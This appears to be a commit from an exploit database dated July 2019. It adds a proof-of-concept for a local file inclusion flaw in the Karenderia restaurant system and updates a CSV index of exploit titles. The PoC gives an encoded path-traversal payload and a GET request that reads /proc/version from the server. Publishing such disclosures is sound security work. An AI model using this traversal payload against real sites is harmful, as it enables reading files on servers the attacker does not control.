DB: 2019-07-06

2 changes to exploits/shellcodes Microsoft Exchange 2003 - base64-MIME Remote Code Execution WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC) Karenderia Multiple Restaurant System 5.3 - Local File Inclusion
2019-07-06 05:01:54 +00:00 · 2019-07-06 05:01:54 +00:00 · 70a1295bcf
commit 70a1295bcf
parent 1a13989f12
3 changed files with 1568 additions and 1 deletions
--- a/exploits/php/webapps/47075.txt
+++ b/exploits/php/webapps/47075.txt
@ -0,0 +1,21 @@
+===========================================================================================
+# Exploit Title: Karenderia CMS 5.1 - LFI Vuln.
+# Dork: N/A
+# Date: 04-07-2019
+# Exploit Author: Mehmet EMIROGLU
+# Software Link:
+https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
+# Version: v5.3
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Karenderia Multiple Restaurant System is a
+restaurant food ordering and restaurant membership system.
+===========================================================================================
+# POC - Frame Inj
+# Parameters : f
+# Attack Pattern :
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion
+# GET Method :
+http://localhost/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
+===========================================================================================
--- a/exploits/windows/remote/47076.py
+++ b/exploits/windows/remote/47076.py
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -17520,6 +17520,7 @@ id,file,description,date,author,type,platform,port
 47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
 47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
 47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
+47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41301,7 +41302,7 @@ id,file,description,date,author,type,platform,port
 46615,exploits/windows/webapps/46615.py,"Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion",2019-03-28,0v3rride,webapps,windows,
 46616,exploits/php/webapps/46616.txt,"Airbnb Clone Script - Multiple SQL Injection",2019-03-28,"Ahmet Ümit BAYRAM",webapps,php,80
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80
-46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion",2019-03-28,"Ali S. Ahmad",webapps,php,80
+46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC)",2019-03-28,"Ali S. Ahmad",webapps,php,80
 46619,exploits/php/webapps/46619.txt,"WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion",2019-03-28,"Ali S. Ahmad",webapps,php,80
 46620,exploits/php/webapps/46620.txt,"i-doit 1.12 - 'qr.php' Cross-Site Scripting",2019-03-28,"BlackFog Team",webapps,php,80
 46622,exploits/php/webapps/46622.txt,"Job Portal 3.1 - 'job_submit' SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80
@ -41457,3 +41458,4 @@ id,file,description,date,author,type,platform,port
 47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
 47069,exploits/php/webapps/47069.py,"Centreon 19.04  - Remote Code Execution",2019-07-02,Askar,webapps,php,
 47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
+47075,exploits/php/webapps/47075.txt,"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion",2019-07-05,"Mehmet EMIROGLU",webapps,php,